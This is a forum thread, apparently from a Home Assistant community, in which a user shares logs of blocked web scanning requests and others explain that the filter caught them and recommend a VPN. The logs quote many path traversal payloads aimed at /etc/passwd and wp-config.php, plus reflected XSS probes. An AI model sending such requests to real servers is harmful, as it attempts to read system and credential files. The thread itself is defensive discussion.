Path traversal hack tentative

jimbojones · January 18, 2023, 9:57am

I noticed that my internet facing Home assistant has been targetted yesterday evening by someone attempting a traversal path attack.

2023-01-16 19:40:54.408 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
2023-01-16 19:40:55.752 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
2023-01-16 19:40:57.125 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2023-01-16 19:40:57.261 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?sl=../../../../../../../etc/passwd%0
2023-01-16 19:40:58.153 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /src/redirect.php?plugins[]=../../../../etc/passwd%00
2023-01-16 19:40:58.537 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_imagebrowser&folder=../../../../etc/passwd
2023-01-16 19:42:13.056 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
2023-01-16 19:42:13.111 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
2023-01-16 19:42:13.687 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
2023-01-16 19:42:13.756 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2023-01-16 19:42:14.794 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
2023-01-16 19:42:40.672 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /comm.php?id=../../../../../../../../../../etc/passwd
2023-01-16 19:42:44.391 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
2023-01-16 19:44:09.777 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
2023-01-16 19:44:11.331 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
2023-01-16 19:44:11.665 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
2023-01-16 19:44:11.679 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
2023-01-16 19:44:14.984 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
2023-01-16 19:44:16.401 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
2023-01-16 19:45:36.162 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
2023-01-16 19:45:37.323 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
2023-01-16 19:45:39.238 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
... hundreds more lines of this type...

Anyone else noticed that ?

Anyone knows how to report this to developpers so that they can double check if no vulnerability is present ?

jimbojones · January 18, 2023, 9:59am

jimbojones:

istant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
2023-01-16 19:45:37.323 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd

It looks like it is not specifically targetting Home assistant though, it is more generalistic

tom_l · January 18, 2023, 10:14am

This is a known attack vector and will no longer work against home assistant. There was a security patch many many versions ago.

anon63427907 · January 18, 2023, 10:41am

It is already saying that it is filtered out…

jimbojones · January 19, 2023, 11:01pm

I know, but I was wondering about what would be displayed in case of successful attack…

Thanks Tom

HeyImAlex · January 19, 2023, 11:16pm

Nothing. It would just serve the resource, in this case /etc/passwd. Thankfully this potential vulnerability (even if they specifically targeted HA, which they did not) was patched. Hence the filtered logs. This doesn’t mean there couldn’t be other yet undiscovered vulnerabilities. As far as I know, HA has never been professionally pentested.

I’d be concerned in general having my instance facing the public internet in that way. Your IP was attacked (randomly or not), there’s no guarantee they won’t try again. Possibly using a more targeted vector against HA, depending on how much they know about your system. I would absolutely switch to something more secure, like Cloudflare Zero Trust or a VPN.

tom_l · January 20, 2023, 3:16am

There are people testing it though. Home-assistant : Security vulnerabilities, CVEs (follow the references).